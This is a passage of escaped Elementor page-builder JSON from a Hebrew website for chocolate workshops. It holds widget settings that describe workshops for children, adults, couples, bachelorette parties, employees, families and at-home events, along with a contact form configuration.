\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ebd837\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"31912ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dab0376\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/01\\/chocolate-1285928_640.jpg\",\"id\":307},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d4\\u05d9\\u05d0 \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05dc\\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d4\\u05de\\u05e9\\u05e4\\u05d7\\u05d4. \\u05d0\\u05d9\\u05df \\u05db\\u05de\\u05d5 \\u05d6\\u05de\\u05df \\u05d0\\u05d9\\u05db\\u05d5\\u05ea \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d5\\u05de\\u05d2\\u05d1\\u05e9 \\u05e9\\u05d9\\u05d7\\u05de\\u05dd \\u05dc\\u05db\\u05dd \\u05d0\\u05ea \\u05d4\\u05dc\\u05d1.\\n\\u05d1\\u05d0\\u05de\\u05e6\\u05e2\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/family-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c5d21d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3c06dba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/01\\/chocolate-1285928_640.jpg\",\"id\":307},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d4\\u05d9\\u05d0 \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05dc\\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d4\\u05de\\u05e9\\u05e4\\u05d7\\u05d4. \\u05d0\\u05d9\\u05df \\u05db\\u05de\\u05d5 \\u05d6\\u05de\\u05df \\u05d0\\u05d9\\u05db\\u05d5\\u05ea \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d5\\u05de\\u05d2\\u05d1\\u05e9 \\u05e9\\u05d9\\u05d7\\u05de\\u05dd \\u05dc\\u05db\\u05dd \\u05d0\\u05ea \\u05d4\\u05dc\\u05d1.\\n\\u05d1\\u05d0\\u05de\\u05e6\\u05e2\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/family-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\"},\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"33\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"33\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"33\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\",\"success_message_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c65b0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6b8474\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30c64bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"56c7701\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 